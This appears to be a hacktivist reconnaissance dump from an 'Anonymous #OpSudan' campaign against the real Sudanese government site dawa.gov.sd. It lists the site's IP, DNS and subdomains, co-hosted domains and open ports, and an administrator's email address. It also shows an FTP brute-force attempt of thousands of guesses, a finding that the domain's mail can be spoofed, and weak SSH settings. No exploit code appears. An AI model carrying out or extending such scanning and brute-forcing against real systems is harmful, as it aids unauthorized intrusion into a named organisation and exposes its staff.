Anonymous JTSEC #OpSudan Full Recon #67

1. #######################################################################################################################################
2. =======================================================================================================================================
3. Hostname dawa.gov.sd ISP Leaseweb Deutschland GmbH
4. Continent Europe Flag
5. DE
6. Country Germany Country Code DE
7. Region Unknown Local time 02 May 2019 12:16 CEST
8. City Unknown Postal Code Unknown
9. IP Address 37.58.63.157 Latitude 51.299
10. Longitude 9.491
11. =======================================================================================================================================
12. #######################################################################################################################################
13. > dawa.gov.sd
14. Server: 38.132.106.139
15. Address: 38.132.106.139#53
16.  
17. Non-authoritative answer:
18. Name: dawa.gov.sd
19. Address: 37.58.63.157
20. >
21. #######################################################################################################################################
22. [i] Scanning Site: http://dawa.gov.sd
23.  
24.  
25.  
26. B A S I C I N F O
27. =======================================================================================================================================
28.  
29.  
30. [+] Site Title: المجلس الأعلى للدعوة والإرشاد
31. [+] IP address: 37.58.63.157
32. [+] Web Server: Could Not Detect
33. [+] CMS: WordPress
34. [+] Cloudflare: Not Detected
35. [+] Robots File: Could NOT Find robots.txt!
36.  
37.  
38.  
39.  
40. G E O I P L O O K U P
41. =======================================================================================================================================
42.  
43. [i] IP Address: 37.58.63.157
44. [i] Country: Germany
45. [i] State:
46. [i] City:
47. [i] Latitude: 51.2993
48. [i] Longitude: 9.491
49.  
50.  
51.  
52.  
53. H T T P H E A D E R S
54. =======================================================================================================================================
55.  
56.  
57. [i] HTTP/1.1 200 OK
58. [i] Date: Thu, 02 May 2019 10:37:49 GMT
59. [i] Content-Type: text/html; charset=UTF-8
60. [i] X-Powered-By: PHP/7.0.33
61. [i] Vary: Accept-Encoding,Cookie
62. [i] Cache-Control: max-age=3, must-revalidate
63. [i] X-Cache-Status: STALE
64. [i] X-Powered-By: PleskLin
65. [i] Connection: close
66.  
67.  
68.  
69.  
70. D N S L O O K U P
71. =======================================================================================================================================
72.  
73. dawa.gov.sd. 21599 IN MX 10 mail.dawa.gov.sd.
74. dawa.gov.sd. 21599 IN TXT "v=spf1 +a +mx -all +a:server.sdserverweb"
75. dawa.gov.sd. 21599 IN A 37.58.63.157
76. dawa.gov.sd. 21599 IN SOA ns1.dawa.gov.sd. aomer1529.gmail.com. 2019041801 10800 3600 604800 10800
77. dawa.gov.sd. 21599 IN NS ns1.dawa.gov.sd.
78. dawa.gov.sd. 21599 IN NS ns2.dawa.gov.sd.
79.  
80.  
81.  
82.  
83. S U B N E T C A L C U L A T I O N
84. =======================================================================================================================================
85.  
86. Address = 37.58.63.157
87. Network = 37.58.63.157 / 32
88. Netmask = 255.255.255.255
89. Broadcast = not needed on Point-to-Point links
90. Wildcard Mask = 0.0.0.0
91. Hosts Bits = 0
92. Max. Hosts = 1 (2^0 - 0)
93. Host Range = { 37.58.63.157 - 37.58.63.157 }
94.  
95.  
96.  
97. N M A P P O R T S C A N
98. =======================================================================================================================================
99.  
100. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 10:37 UTC
101. Nmap scan report for dawa.gov.sd (37.58.63.157)
102. Host is up (0.086s latency).
103.  
104. PORT STATE SERVICE
105. 21/tcp open ftp
106. 22/tcp open ssh
107. 23/tcp closed telnet
108. 80/tcp open http
109. 110/tcp open pop3
110. 143/tcp open imap
111. 443/tcp open https
112. 3389/tcp closed ms-wbt-server
113.  
114. Nmap done: 1 IP address (1 host up) scanned in 0.15 seconds
115.  
116.  
117.  
118. S U B - D O M A I N F I N D E R
119. =======================================================================================================================================
120.  
121.  
122. [i] Total Subdomains Found : 2
123.  
124. [+] Subdomain: ns2.dawa.gov.sd
125. [-] IP: 37.58.63.157
126.  
127. [+] Subdomain: mail.dawa.gov.sd
128. [-] IP: 37.58.63.157
129. #######################################################################################################################################
130. [?] Enter the target: example( http://domain.com )
131. http://dawa.gov.sd/
132. [!] IP Address : 37.58.63.157
133. [!] dawa.gov.sd doesn't seem to use a CMS
134. [+] Honeypot Probabilty: 30%
135. ---------------------------------------------------------------------------------------------------------------------------------------
136. [~] Trying to gather whois information for dawa.gov.sd
137. [+] Whois information found
138. [-] Unable to build response, visit https://who.is/whois/dawa.gov.sd
139. ---------------------------------------------------------------------------------------------------------------------------------------
140. PORT STATE SERVICE
141. 21/tcp open ftp
142. 22/tcp open ssh
143. 23/tcp closed telnet
144. 80/tcp open http
145. 110/tcp open pop3
146. 143/tcp open imap
147. 443/tcp open https
148. 3389/tcp closed ms-wbt-server
149. Nmap done: 1 IP address (1 host up) scanned in 0.13 seconds
150. --------------------------------------------------------------------------------------------------------------------------------------
151.  
152. [+] DNS Records
153. ns2.dawa.gov.sd. (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
154. ns1.dawa.gov.sd. (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
155.  
156. [+] MX Records
157. 10 (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
158.  
159. [+] Host Records (A)
160. ns1.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
161. ns2.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
162. mail.dawa.gov.sdHTTP: (37.58.63.157) AS28753 Leaseweb Deutschland GmbH Germany
163.  
164. [+] TXT Records
165. "v=spf1 +a +mx -all +a:server.sdserverweb"
166.  
167. [+] DNS Map: https://dnsdumpster.com/static/map/dawa.gov.sd.png
168.  
169. [>] Initiating 3 intel modules
170. [>] Loading Alpha module (1/3)
171. [>] Beta module deployed (2/3)
172. [>] Gamma module initiated (3/3)
173. No emails found
174.  
175. [+] Hosts found in search engines:
176. ---------------------------------------------------------------------------------------------------------------------------------------
177. [-] Resolving hostnames IPs...
178. 37.58.63.157:www.dawa.gov.sd
179. [+] Virtual hosts:
180. ---------------------------------------------------------------------------------------------------------------------------------------
181. 37.58.63.157 aoif.gov.sd
182. 37.58.63.157 alfaezontour.com
183. 37.58.63.157 ahmedsaeedlawfirm.com
184. 37.58.63.157 haloob-sd.com
185. 37.58.63.157 dawa.gov.sd
186. 37.58.63.157 www.dawa.gov.sd
187. #######################################################################################################################################
188. Enter Address Website = dawa.gov.sd
189.  
190. Reversing IP With HackTarget 'dawa.gov.sd'
191. ---------------------------------------------------------------------------------------------------------------------------------------
192.  
193. [+] afrabia.org
194. [+] alfaezontour.com
195. [+] aoif.gov.sd
196. [+] dawa.gov.sd
197. [+] haloob-sd.com
198. [+] mail.afrabia.org
199. [+] mail.alfaezontour.com
200. [+] mail.aoif.gov.sd
201. [+] mail.dawa.gov.sd
202. [+] mail.haloob-sd.com
203. [+] mta-sts.mail.afrabia.org
204. [+] mta-sts.mail.alfaezontour.com
205. [+] mta-sts.mail.haloob-sd.com
206. [+] ns1.aoif.gov.sd
207. [+] ns1.dawa.gov.sd
208. [+] ns2.aoif.gov.sd
209. [+] ns2.dawa.gov.sd
210. #######################################################################################################################################
211.  
212. Reverse IP With YouGetSignal 'dawa.gov.sd'
213. ---------------------------------------------------------------------------------------------------------------------------------------
214.  
215. [*] IP: 37.58.63.157
216. [*] Domain: dawa.gov.sd
217. [*] Total Domains: 1
218.  
219. [+] dawa.gov.sd
220. #######################################################################################################################################
221.  
222. Geo IP Lookup 'dawa.gov.sd'
223. ---------------------------------------------------------------------------------------------------------------------------------------
224.  
225. [+] IP Address: 37.58.63.157
226. [+] Country: Germany
227. [+] State:
228. [+] City:
229. [+] Latitude: 51.2993
230. [+] Longitude: 9.491
231. ######################################################################################################################################
232.  
233. Bypass Cloudflare 'dawa.gov.sd'
234. ---------------------------------------------------------------------------------------------------------------------------------------
235.  
236. [!] CloudFlare Bypass 37.58.63.157 | ftp.dawa.gov.sd
237. [!] CloudFlare Bypass 37.58.63.157 | webmail.dawa.gov.sd
238. [!] CloudFlare Bypass 37.58.63.157 | mail.dawa.gov.sd
239. [!] CloudFlare Bypass 37.58.63.157 | www.dawa.gov.sd
240. [!] CloudFlare Bypass 37.58.63.157 | ns1.dawa.gov.sd
241. [!] CloudFlare Bypass 37.58.63.157 | ns2.dawa.gov.sd
242. #######################################################################################################################################
243.  
244. DNS Lookup 'dawa.gov.sd'
245. ---------------------------------------------------------------------------------------------------------------------------------------
246.  
247. [+] dawa.gov.sd. 21599 IN MX 10 mail.dawa.gov.sd.
248. [+] dawa.gov.sd. 21599 IN TXT "v=spf1 +a +mx -all +a:server.sdserverweb"
249. [+] dawa.gov.sd. 21599 IN A 37.58.63.157
250. [+] dawa.gov.sd. 21599 IN SOA ns1.dawa.gov.sd. aomer1529.gmail.com. 2019041801 10800 3600 604800 10800
251. [+] dawa.gov.sd. 21599 IN NS ns1.dawa.gov.sd.
252. [+] dawa.gov.sd. 21599 IN NS ns2.dawa.gov.sd.
253. #######################################################################################################################################
254.  
255. Show HTTP Header 'dawa.gov.sd'
256. ---------------------------------------------------------------------------------------------------------------------------------------
257.  
258. [+] HTTP/1.1 200 OK
259. [+] Server: nginx
260. [+] Date: Thu, 02 May 2019 10:37:34 GMT
261. [+] Content-Type: text/html; charset=UTF-8
262. [+] Connection: keep-alive
263. [+] X-Powered-By: PHP/7.0.33
264. [+] Vary: Accept-Encoding,Cookie
265. [+] Link: ; rel="https://api.w.org/", ; rel=shortlink
266. [+] X-Cache-Status: MISS
267. [+] X-Powered-By: PleskLin
268. #######################################################################################################################################
269.  
270. Port Scan 'dawa.gov.sd'
271. ---------------------------------------------------------------------------------------------------------------------------------------
272.  
273. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 10:37 UTC
274. Nmap scan report for dawa.gov.sd (37.58.63.157)
275. Host is up (0.086s latency).
276.  
277. PORT STATE SERVICE
278. 21/tcp open ftp
279. 22/tcp open ssh
280. 23/tcp closed telnet
281. 80/tcp open http
282. 110/tcp open pop3
283. 143/tcp open imap
284. 443/tcp open https
285. 3389/tcp closed ms-wbt-server
286.  
287. Nmap done: 1 IP address (1 host up) scanned in 0.75 seconds
288. #######################################################################################################################################
289.  
290. Traceroute 'dawa.gov.sd'
291. ---------------------------------------------------------------------------------------------------------------------------------------
292.  
293. Start: 2019-05-02T10:37:47+0000
294. HOST: web01 Loss% Snt Last Avg Best Wrst StDev
295. 1.|-- 45.79.12.202 0.0% 3 0.8 0.9 0.8 1.0 0.1
296. 2.|-- 45.79.12.6 0.0% 3 0.5 0.8 0.5 1.5 0.6
297. 3.|-- dls-b22-link.telia.net 0.0% 3 0.9 1.5 0.9 2.6 0.9
298. 4.|-- atl-b22-link.telia.net 0.0% 3 19.5 19.8 19.5 20.0 0.3
299. 5.|-- ash-bb4-link.telia.net 0.0% 3 142.3 143.0 142.3 144.3 1.1
300. 6.|-- prs-bb3-link.telia.net 0.0% 3 141.7 141.8 141.7 141.9 0.1
301. 7.|-- ffm-bb3-link.telia.net 0.0% 3 141.4 141.6 141.4 141.8 0.2
302. 8.|-- ffm-b10-link.telia.net 0.0% 3 142.1 142.8 142.0 144.3 1.3
303. 9.|-- leaseweb-ic-146206-ffm-b10.c.telia.net 0.0% 3 134.9 135.1 134.8 135.5 0.4
304. 10.|-- po-6.ce02.fra-10.de.leaseweb.net 0.0% 3 134.3 134.5 134.3 134.6 0.2
305. 11.|-- hosted-by.leaseweb.com 0.0% 3 137.1 137.7 135.0 141.0 3.0
306. 12.|-- 37.58.63.157 0.0% 3 134.5 134.5 134.4 134.8 0.2
307. #######################################################################################################################################
308.  
309. Ping 'dawa.gov.sd'
310. ---------------------------------------------------------------------------------------------------------------------------------------
311.  
312.  
313. Starting Nping 0.7.70 ( https://nmap.org/nping ) at 2019-05-02 10:38 UTC
314. SENT (0.1695s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=1] IP [ttl=64 id=59325 iplen=28 ]
315. RCVD (0.3694s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=1] IP [ttl=57 id=24490 iplen=28 ]
316. SENT (1.1697s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=3] IP [ttl=64 id=59325 iplen=28 ]
317. RCVD (1.3894s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=3] IP [ttl=57 id=24550 iplen=28 ]
318. SENT (2.1716s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=3] IP [ttl=64 id=59325 iplen=28 ]
319. RCVD (2.4094s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=3] IP [ttl=57 id=25092 iplen=28 ]
320. SENT (3.1734s) ICMP [104.237.144.6 > 37.58.63.157 Echo request (type=8/code=0) id=49904 seq=4] IP [ttl=64 id=59325 iplen=28 ]
321. RCVD (3.4297s) ICMP [37.58.63.157 > 104.237.144.6 Echo reply (type=0/code=0) id=49904 seq=4] IP [ttl=57 id=25620 iplen=28 ]
322.  
323. Max rtt: 256.401ms | Min rtt: 199.928ms | Avg rtt: 228.422ms
324. Raw packets sent: 4 (112B) | Rcvd: 4 (184B) | Lost: 0 (0.00%)
325. Nping done: 1 IP address pinged in 3.43 seconds
326. #######################################################################################################################################
327. =======================================================================================================================================
328. | E-mails:
329. | [+] E-mail Found: humbedooh@apache.org
330. | [+] E-mail Found: m@tidakada.com
331. | [+] E-mail Found: kevinh@kevcom.com
332. | [+] E-mail Found: mike@hyperreal.org
333. =======================================================================================================================================
334. | External hosts:
335. | [+] External Host Found: http://httpd.apache.org
336. | [+] External Host Found: http://html5shiv.googlecode.com
337. | [+] External Host Found: https://planet.wordpress.org
338. | [+] External Host Found: https://developer.wordpress.org
339. | [+] External Host Found: http://maps.google.com
340. | [+] External Host Found: https://wordpress.org
341. | [+] External Host Found: https://httpd.apache.org
342. | [+] External Host Found: https://codex.wordpress.org
343. | [+] External Host Found: https://www.mysql.com
344. | [+] External Host Found: https://secure.php.net
345. =======================================================================================================================================
346. #######################################################################################################################################
347. ; <<>> DiG 9.11.5-P4-3-Debian <<>> dawa.gov.sd
348. ;; global options: +cmd
349. ;; Got answer:
350. ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 20267
351. ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
352.  
353. ;; OPT PSEUDOSECTION:
354. ; EDNS: version: 0, flags:; udp: 4096
355. ;; QUESTION SECTION:
356. ;dawa.gov.sd. IN A
357.  
358. ;; ANSWER SECTION:
359. dawa.gov.sd. 83544 IN A 37.58.63.157
360.  
361. ;; Query time: 45 msec
362. ;; SERVER: 38.132.106.139#53(38.132.106.139)
363. ;; WHEN: jeu mai 02 07:25:06 EDT 2019
364. ;; MSG SIZE rcvd: 56
365. #######################################################################################################################################
366. ; <<>> DiG 9.11.5-P4-3-Debian <<>> +trace dawa.gov.sd
367. ;; global options: +cmd
368. . 79994 IN NS e.root-servers.net.
369. . 79994 IN NS d.root-servers.net.
370. . 79994 IN NS a.root-servers.net.
371. . 79994 IN NS j.root-servers.net.
372. . 79994 IN NS h.root-servers.net.
373. . 79994 IN NS b.root-servers.net.
374. . 79994 IN NS i.root-servers.net.
375. . 79994 IN NS g.root-servers.net.
376. . 79994 IN NS c.root-servers.net.
377. . 79994 IN NS l.root-servers.net.
378. . 79994 IN NS m.root-servers.net.
379. . 79994 IN NS f.root-servers.net.
380. . 79994 IN NS k.root-servers.net.
381. . 79994 IN RRSIG NS 8 0 518400 20190515050000 20190502040000 25266 . 2rLhHAah0uVLpouEAndHvtO3EjI5CwqZ8/K187iZR6NGs+qOxsp2cPXP PmBoRmtsikSbGkEKwqS3DUE7Q15e0iFQGZ3BUSkOviEO4JHDN3R4RKmC XwV4qcrvW9wkfjiK1hUN9GF2OUQxcw6PUH34EM3LDGyZDkcOk6RC0ebA j/gcUMuEr3gFEdenjZ9fTOa0rmNf6m/QiOBJDRp9noDFUbdjElOVp6bA 8GKfXYPeZh1a86CZOIfnqW3kIKo1xSRgWGkSTnadp3YU2t1D+vQeFB3Y T3w9+PyKv02Owkh78LmKyg566izJG39qGQFpFAhcLRXpwQyfLHsCBtBK Z3bcRg==
382. ;; Received 525 bytes from 38.132.106.139#53(38.132.106.139) in 32 ms
383.  
384. sd. 172800 IN NS sd.cctld.authdns.ripe.net.
385. sd. 172800 IN NS ns1.uaenic.ae.
386. sd. 172800 IN NS ns2.uaenic.ae.
387. sd. 172800 IN NS ans1.sis.sd.
388. sd. 172800 IN NS ans1.canar.sd.
389. sd. 172800 IN NS ans2.canar.sd.
390. sd. 172800 IN NS ns-sd.afrinic.net.
391. sd. 86400 IN NSEC se. NS RRSIG NSEC
392. sd. 86400 IN RRSIG NSEC 8 1 86400 20190515050000 20190502040000 25266 . g+harqZ1tGQpilhEPl6sCmANi9/nyvD6Ke4T9JiQaw5FUJ5UxMvalm8N J7Eh+bpvaOiMaVItikaiaYW9FrztnxGYcPe8WAo00ONsYoLJ0ldU8V4F fOOdfE3PEXnXLgSAKw1qwtbPYm+xnhbMc/yXP+jgWnwZi5MTxpkws+Ms aFFBcJxflSejbjymO+XwZB+Ee+hRdgwq1k+aIMxuDVOhcFUKGrA2bX0g 9ba/4YsfNi8vapW9941p/yrZMgY89xlY4XSraAsLM2o62Egi9i4XNqPS gIplVnuJxKUdwgISP71FT5Hv3SemlddjNG1mEYium3yYe8SF3TtqViD+ t2ENkg==
393. ;; Received 698 bytes from 199.7.91.13#53(d.root-servers.net) in 36 ms
394.  
395. ;; Received 68 bytes from 213.42.0.226#53(ns1.uaenic.ae) in 221 ms
396. #######################################################################################################################################
397. [*] Performing General Enumeration of Domain: dawa.gov.sd
398. [-] DNSSEC is not configured for dawa.gov.sd
399. [*] SOA ns1.dawa.gov.sd 37.58.63.157
400. [*] NS ns1.dawa.gov.sd 37.58.63.157
401. [*] Bind Version for 37.58.63.157 none
402. [*] NS ns2.dawa.gov.sd 37.58.63.157
403. [*] Bind Version for 37.58.63.157 none
404. [*] MX mail.dawa.gov.sd 37.58.63.157
405. [*] A dawa.gov.sd 37.58.63.157
406. [*] TXT dawa.gov.sd v=spf1 +a +mx -all +a:server.sdserverweb
407. [*] Enumerating SRV Records
408. [-] No SRV Records Found for dawa.gov.sd
409. [+] 0 Records Found
410. #######################################################################################################################################
411. [*] Processing domain dawa.gov.sd
412. [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
413. [+] Getting nameservers
414. 37.58.63.157 - ns1.dawa.gov.sd
415. 37.58.63.157 - ns2.dawa.gov.sd
416. [-] Zone transfer failed
417.  
418. [+] TXT records found
419. "v=spf1 +a +mx -all +a:server.sdserverweb"
420.  
421. [+] MX records found, added to target list
422. 10 mail.dawa.gov.sd.
423.  
424. [*] Scanning dawa.gov.sd for A records
425. 37.58.63.157 - dawa.gov.sd
426. 37.58.63.157 - ftp.dawa.gov.sd
427. 37.58.63.157 - ipv4.dawa.gov.sd
428. 37.58.63.157 - mail.dawa.gov.sd
429. 37.58.63.157 - ns1.dawa.gov.sd
430. 37.58.63.157 - ns2.dawa.gov.sd
431. 37.58.63.157 - webmail.dawa.gov.sd
432. 37.58.63.157 - www.dawa.gov.sd
433. #######################################################################################################################################
434. Ip Address Status Type Domain Name Server
435. ---------- ------ ---- ----------- ------
436. 37.58.63.157 403 alias ftp.dawa.gov.sd
437. 37.58.63.157 403 host dawa.gov.sd
438. 37.58.63.157 403 host mail.dawa.gov.sd
439. 37.58.63.157 403 host ns1.dawa.gov.sd
440. 37.58.63.157 403 host ns2.dawa.gov.sd
441. 37.58.63.157 200 host webmail.dawa.gov.sd
442. 37.58.63.157 403 alias www.dawa.gov.sd
443. 37.58.63.157 403 host dawa.gov.sd #######################################################################################################################################
444. dnsenum VERSION:1.2.4
445.  
446. ----- dawa.gov.sd -----
447.  
448.  
449. Host's addresses:
450. __________________
451.  
452. dawa.gov.sd. 84452 IN A 37.58.63.157
453.  
454.  
455. Name Servers:
456. ______________
457.  
458. ns2.dawa.gov.sd. 85816 IN A 37.58.63.157
459. ns1.dawa.gov.sd. 85816 IN A 37.58.63.157
460.  
461.  
462. Mail (MX) Servers:
463. ___________________
464.  
465. mail.dawa.gov.sd. 85815 IN A 37.58.63.157
466.  
467.  
468. Trying Zone Transfers and getting Bind Versions:
469. _________________________________________________
470.  
471.  
472. Trying Zone Transfer for dawa.gov.sd on ns2.dawa.gov.sd ...
473.  
474. Trying Zone Transfer for dawa.gov.sd on ns1.dawa.gov.sd ...
475.  
476. brute force file not specified, bay.
477. #######################################################################################################################################
478.  
479. ____ _ _ _ _ _____
480. / ___| _ _| |__ | (_)___| |_|___ / _ __
481. \___ \| | | | '_ \| | / __| __| |_ \| '__|
482. ___) | |_| | |_) | | \__ \ |_ ___) | |
483. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
484.  
485. # Coded By Ahmed Aboul-Ela - @aboul3la
486.  
487. [-] Enumerating subdomains now for dawa.gov.sd
488. [-] verbosity is enabled, will show the subdomains results in realtime
489. [-] Searching now in Baidu..
490. [-] Searching now in Yahoo..
491. [-] Searching now in Google..
492. [-] Searching now in Bing..
493. [-] Searching now in Ask..
494. [-] Searching now in Netcraft..
495. [-] Searching now in DNSdumpster..
496. [-] Searching now in Virustotal..
497. [-] Searching now in ThreatCrowd..
498. [-] Searching now in SSL Certificates..
499. [-] Searching now in PassiveDNS..
500. DNSdumpster: ns1.dawa.gov.sd
501. DNSdumpster: ns2.dawa.gov.sd
502. DNSdumpster: mail.dawa.gov.sd
503. Yahoo: www.dawa.gov.sd
504. [-] Saving results to file: /usr/share/sniper/loot//domains/domains-dawa.gov.sd.txt
505. [-] Total Unique Subdomains Found: 4
506. www.dawa.gov.sd
507. mail.dawa.gov.sd
508. ns1.dawa.gov.sd
509. ns2.dawa.gov.sd
510. #######################################################################################################################################
511. dawa.gov.sd 37.58.63.157
512. mail.dawa.gov.sd 37.58.63.157
513. ns1.dawa.gov.sd 37.58.63.157
514. ns2.dawa.gov.sd 37.58.63.157
515. webmail.dawa.gov.sd 37.58.63.157
516. ftp.dawa.gov.sd 37.58.63.157
517. www.dawa.gov.sd 37.58.63.157
518. #######################################################################################################################################
519. ===============================================
520. -=Subfinder v1.1.3 github.com/subfinder/subfinder
521. ===============================================
522.  
523.  
524. Running Source: Ask
525. Running Source: Archive.is
526. Running Source: Baidu
527. Running Source: Bing
528. Running Source: CertDB
529. Running Source: CertificateTransparency
530. Running Source: Certspotter
531. Running Source: Commoncrawl
532. Running Source: Crt.sh
533. Running Source: Dnsdb
534. Running Source: DNSDumpster
535. Running Source: DNSTable
536. Running Source: Dogpile
537. Running Source: Exalead
538. Running Source: Findsubdomains
539. Running Source: Googleter
540. Running Source: Hackertarget
541. Running Source: Ipv4Info
542. Running Source: PTRArchive
543. Running Source: Sitedossier
544. Running Source: Threatcrowd
545. Running Source: ThreatMiner
546. Running Source: WaybackArchive
547. Running Source: Yahoo
548.  
549. Running enumeration on dawa.gov.sd
550.  
551. dnsdb: Unexpected return status 503
552.  
553. dogpile: Get https://www.dogpile.com/search/web?q=dawa.gov.sd&qsi=1: EOF
554.  
555. waybackarchive: parse http://web.archive.org/cdx/search/cdx?url=*.dawa.gov.sd/*&output=json&fl=original&collapse=urlkey&page=: net/url: invalid control character in URL
556.  
557. archiveis: Get https://archive.fo/*.dawa.gov.sd: dial tcp 51.38.113.224:443: connect: connection timed out
558.  
559.  
560. Starting Bruteforcing of dawa.gov.sd with 9985 words
561.  
562. Total 12 Unique subdomains found for dawa.gov.sd
563.  
564. .dawa.gov.sd
565. ftp.dawa.gov.sd
566. ipv4.dawa.gov.sd
567. mail.dawa.gov.sd
568. mail.dawa.gov.sd
569. ns1.dawa.gov.sd
570. ns1.dawa.gov.sd
571. ns2.dawa.gov.sd
572. ns2.dawa.gov.sd
573. webmail.dawa.gov.sd
574. www.dawa.gov.sd
575. www.dawa.gov.sd
576. #######################################################################################################################################
577. [*] Processing domain dawa.gov.sd
578. [*] Using system resolvers ['38.132.106.139', '194.187.251.67', '185.93.180.131', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
579. [+] Getting nameservers
580. 37.58.63.157 - ns1.dawa.gov.sd
581. 37.58.63.157 - ns2.dawa.gov.sd
582. [-] Zone transfer failed
583.  
584. [+] TXT records found
585. "v=spf1 +a +mx -all +a:server.sdserverweb"
586.  
587. [+] MX records found, added to target list
588. 10 mail.dawa.gov.sd.
589.  
590. [*] Scanning dawa.gov.sd for A records
591. 37.58.63.157 - dawa.gov.sd
592. 37.58.63.157 - ftp.dawa.gov.sd
593. 37.58.63.157 - mail.dawa.gov.sd
594. 37.58.63.157 - ns1.dawa.gov.sd
595. 37.58.63.157 - ns2.dawa.gov.sd
596. 37.58.63.157 - webmail.dawa.gov.sd
597. 37.58.63.157 - www.dawa.gov.sd
598. #######################################################################################################################################
599. [*] Found SPF record:
600. [*] v=spf1 +a +mx -all +a:server.sdserverweb
601. [*] SPF record contains an All item: -all
602. [*] No DMARC record found. Looking for organizational record
603. [+] No organizational DMARC record
604. [+] Spoofing possible for dawa.gov.sd!
605. #######################################################################################################################################
606. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
607. Nmap scan report for dawa.gov.sd (37.58.63.157)
608. Host is up (0.12s latency).
609. Not shown: 459 closed ports, 3 filtered ports
610. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
611. PORT STATE SERVICE
612. 21/tcp open ftp
613. 22/tcp open ssh
614. 53/tcp open domain
615. 80/tcp open http
616. 110/tcp open pop3
617. 143/tcp open imap
618. 443/tcp open https
619. 465/tcp open smtps
620. 993/tcp open imaps
621. 995/tcp open pop3s
622. 3306/tcp open mysql
623. 7080/tcp open empowerid
624. 8443/tcp open https-alt
625. 8880/tcp open cddbp-alt
626. #######################################################################################################################################
627. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
628. Nmap scan report for dawa.gov.sd (37.58.63.157)
629. Host is up (0.086s latency).
630. Not shown: 9 closed ports, 2 filtered ports
631. PORT STATE SERVICE
632. 53/udp open domain
633. 68/udp open|filtered dhcpc
634. 139/udp open|filtered netbios-ssn
635. #######################################################################################################################################
636. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 06:56 EDT
637. Nmap scan report for dawa.gov.sd (37.58.63.157)
638. Host is up (0.10s latency).
639.  
640. PORT STATE SERVICE VERSION
641. 21/tcp open ftp ProFTPD
642. | ftp-brute:
643. | Accounts: No valid accounts found
644. |_ Statistics: Performed 7705 guesses in 236 seconds, average tps: 30.6
645. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
646. Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.10 - 4.11 (94%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.18 (93%), HP P2000 G3 NAS device (93%), Linux 3.16 - 4.6 (92%)
647. No exact OS matches for host (test conditions non-ideal).
648. Network Distance: 14 hops
649.  
650. TRACEROUTE (using port 21/tcp)
651. HOP RTT ADDRESS
652. 1 24.38 ms 10.246.200.1
653. 2 22.95 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
654. 3 27.58 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
655. 4 23.60 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
656. 5 21.24 ms motl-b1-link.telia.net (62.115.162.41)
657. 6 ...
658. 7 119.03 ms ldn-bb3-link.telia.net (62.115.113.21)
659. 8 118.67 ms prs-bb3-link.telia.net (62.115.134.92)
660. 9 118.66 ms ffm-bb3-link.telia.net (62.115.123.12)
661. 10 118.18 ms ffm-b10-link.telia.net (62.115.137.211)
662. 11 113.87 ms leaseweb-ic-146206-ffm-b10.c.telia.net (80.239.132.78)
663. 12 112.68 ms po-6.ce01.fra-10.de.leaseweb.net (178.162.223.155)
664. 13 116.23 ms hosted-by.leaseweb.com (46.165.226.255)
665. 14 112.97 ms 37.58.63.157
666. #######################################################################################################################################
667. # general
668. (gen) banner: SSH-2.0-OpenSSH_7.4
669. (gen) software: OpenSSH 7.4
670. (gen) compatibility: OpenSSH 7.3+ (some functionality from 6.6), Dropbear SSH 2016.73+ (some functionality from 0.52)
671. (gen) compression: enabled (zlib@openssh.com)
672.  
673. # key exchange algorithms
674. (kex) curve25519-sha256 -- [warn] unknown algorithm
675. (kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
676. (kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
677. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
678. (kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
679. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
680. (kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
681. `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
682. (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
683. `- [info] available since OpenSSH 4.4
684. (kex) diffie-hellman-group16-sha512 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
685. (kex) diffie-hellman-group18-sha512 -- [info] available since OpenSSH 7.3
686. (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
687. `- [warn] using weak hashing algorithm
688. `- [info] available since OpenSSH 2.3.0
689. (kex) diffie-hellman-group14-sha256 -- [info] available since OpenSSH 7.3, Dropbear SSH 2016.73
690. (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
691. `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
